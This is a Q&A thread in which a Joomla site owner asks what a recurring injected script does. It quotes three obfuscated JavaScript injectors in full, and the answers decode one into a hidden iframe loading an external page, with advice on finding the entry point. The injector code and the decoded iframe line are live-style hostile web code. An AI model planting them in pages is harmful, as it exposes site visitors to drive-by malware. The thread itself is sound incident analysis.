# What does this script do?

Tags: javascript, security

Would anybody be able to tell me what the below script does? It keeps injecting itself into our site about every two weeks (always between Sundays and Mondays). We've reloaded our "clean" site dozens of times but it just keeps happening. We've installed and made every security recommendation that we've read but it just keeps getting into all of our index.html files and a few of our php files.

Anybody have any idea of what it does or where it comes from? We could really use some help!

```
<script>
var ar="v)y{ifu=lg[rETCB}me h>;
s\"/ 0.,tN1:('<cAb]waonpd";
try{
    'qwe'.length(1);
}catch(a){
    k=new Boolean().toString();
    date=new Date();
};
var ar2 = "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');

pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));

e=Function("retu"+pau)();
ar2=('gfhgffg',e(ar2));s="";

for(i=0;i<ar2.length;i++){
    s+=ar.substr(ar2[i]/3,1);
}
e(s);

</script>

<script>
var ar="N<B)10'paes,>.nidtf3[T;
hwy mCE:gA{](=o/\"c}lbr vu";
try{
    'qwe'.length(1);
}catch(a){
    k=new Boolean().toString();
    date=new Date();
};

var ar2 = "f78,78,45,54,135,105,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,9,99,78,78,78,45,54,132,24,81,27,132,105,9,66,78,78,123,135,27,126,30,27,135,99,78,78,78,48,111,120,141,81,27,42,51,39,72,132,45,51,27,105,117,3,45,54,132,24,81,27,135,30,132,120,108,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,135,72,45,48,51,69,108,18,12,15,18,135,69,27,45,93,69,51,108,18,12,15,18,135,30,51,75,126,27,108,18,138,45,30,45,129,45,126,45,51,75,90,69,45,48,48,27,42,66,21,111,30,45,51,45,111,42,90,24,129,30,111,126,141,51,27,66,126,27,54,51,90,15,66,51,111,21,90,15,66,18,36,3,114,45,54,132,24,81,27,36,117,9,66,78,78,123,78,78,54,141,42,120,51,45,111,42,135,45,54,132,24,81,27,132,105,9,99,78,78,78,138,24,132,135,54,135,108,135,48,111,120,141,81,27,42,51,39,120,132,27,24,51,27,87,126,27,81,27,42,51,105,18,45,54,132,24,81,27,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,30,132,120,18,33,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,9,66,54,39,30,51,75,126,27,39,138,45,30,45,129,45,126,45,51,75,108,18,69,45,48,48,27,42,18,66,54,39,30,51,75,126,27,39,21,111,30,45,51,45,111,42,108,18,24,129,30,111,126,141,51,27,18,66,54,39,30,51,75,126,27,39,126,27,54,51,108,18,15,18,66,54,39,30,51,75,126,27,39,51,111,21,108,18,15,18,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,72,45,48,51,69,18,33,18,12,15,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,69,27,45,93,69,51,18,33,18,12,15,18,9,66,78,78,78,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,39,24,21,21,27,42,48,84,69,45,126,48,105,54,9,66,78,78,123]".replace(k.substr(0,1),'[');

pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));

e=Function("retu"+pau)();

ar2=('gfhgffg',e(ar2));

s="";

for(i=0;i<ar2.length;i++){
    s+=ar.substr(ar2[i]/3,1);
}
e(s);
</script>


<script>
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
try{
    gserkewg();
}catch(a){
    k=new Boolean().toString()
};

var ar2 = "f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126,-99,21,-60,84,-6,-60,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,21,90,-84,48,-21,-30,36,-60,3,123,-126,21,3,96,-93,30,-33,30,6,-60,3,123,-126,21,21,12,-57,117,6,-60,-60,9,18,15,-15,12,-12,87,-87,27,-57,-9,36,3,48,0,45,3,-15,-117,87,-36,-15,27,-27,51,45,-135,96,-45,3,36,36,-108,48,66,-12,6,6,-135,69,-66,138,-18,-54,24,-87,-3,138,-18,-108,117,-36,18,-72,-42,-3,102,-90,126,-3,-45,-42,78,-60,0,45,-45,0,-63,21,117,-57,-12,-27,51,45,-102,6,-42,-3,102,-90,126,-138,105,-57,15,3,0,0,-39,75,-102,39,-36,36,39,-39,54,3,-12,-60,-12,126,3,-69,36,-24,-84,138,-36,-30,66,-105,99,6,-126,126,3,-69,33,-87,27,-42,-3,102,-90,126,-120,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,42,-60,84,-66,18,-18,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,30,78,-123,105,-48,12,-57,117,6,-30,-81,18,15,-15,12,-12,87,-87,27,-57,63,-60,24,3,48,0,45,3,-123,108,-123,105,-48,12,-57,117,6,-30,-99,87,-36,-15,27,-27,51,45,-63,-60,84,-45,3,36,36,-108,48,66,-120,108,-123,105,-48,12,-57,117,6,-30,24,6,-135,69,6,-60,126,-126,108,-123,105,-48,12,-57,117,6,-30,-36,24,-87,69,-60,126,-126,108,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,111,-84,48,-21,-30,-24,18,-18,3,123,-126,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,24,96,-93,30,-33,30,-54,18,-18,3,123,-126,30,78,-60,0,0,27,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-15,-6,-93,0,129,3,-48,-6,-45,3,87,-39,12,-102,45,78,-60,0,45]".replace(k.substr(0,1),'[');

try{
    asfasf();
}catch(e)
{
    p=(typeof document).toString()
};

pau="rn evobject".replace(p,"al");
e=new Function("","retu"+pau);
e=e();
ar2=e(ar2);
s="";
var pos=0;

for(i=0;i!=ar2.length;i++){
    pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;
    s+=ar.substr(pos,1);
}
e(s);
</script>
```

Comment: Let me guess, you're running wordpress right?

Comment: It's Joomla actually. It's been updated to the most recent version and we have changed our passwords every single time it's happened. FTP passwords have been removed so nothing is even stored. We've installed several different security components, but nothing get red flagged until the site goes completely down. And we've never been able to find anything suspicious in the access log files. How do we go about looking for some sort of XXS injection or something in the database? We're at a loss. Thanks to everyone for their comments!

Answer (score 15):

Via the power of [JSUnpack](http://jsunpack.jeek.org/dec/go?report=286caa9bf8a54231f618d280c16b7d8720dd1ed0), we can decrypt a chunk of that obfuscated code and see part of the functionality...

`document.write (s)  <iframe src='http://doloasxxxxedoutforsafety.com/count0.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>`

That source is currently 404, but it doesn't look very friendly. It's effectively downloading an arbitrary page into the browser, which could be for something as "simple" as fake Pagerank building through to a malicious drive by code execution exploit. Regardless, it appears dead for now, but it probably wasn't trying to help you.

You seem to have some kind of XSS injection flaw in your site software (or a malicious internal user). Looks like it's time for a proper security audit (both of server, server software, and your PHP application). If you're running an off the shelf PHP package (like Wordpress), make sure you've upgraded to the latest version. You might also want to change any relevant passwords (if it's happening on a regular schedule, it might be a manual injection).

Comment: great tool! never knew about this before

Answer (score 5):

The script is probably designed to lure users to a site containing malware and browser exploits.

The reason that you're repeatedly being infected is because somewhere in your codebase there is a vulnerability. I suspect you've got an unprotected or broken file upload page that allows any old file to be uploaded (including scripts) and then executed. Once it's done infecting your files it probably delete's itself.

I would have a trawl through your web server log files at around the time the infection happens and look for suspicious activity for any pages that allow users to upload content.

Answer (score 0):

what other scripts do you use on your site? look at those because those could be injecting this.
maybe your webhost is shady, try to change. Or it could be a web analytics  code

Answer (score 0):

The exact same code is being injected into the index.html file on one of my sites. By looking at the logs we determined that someone with the IP address 84.16.226.245 had gotten access via FTP. We're not exactly sure how he got in yet, but you might want to take a look at your logs and block that address.

Good luck!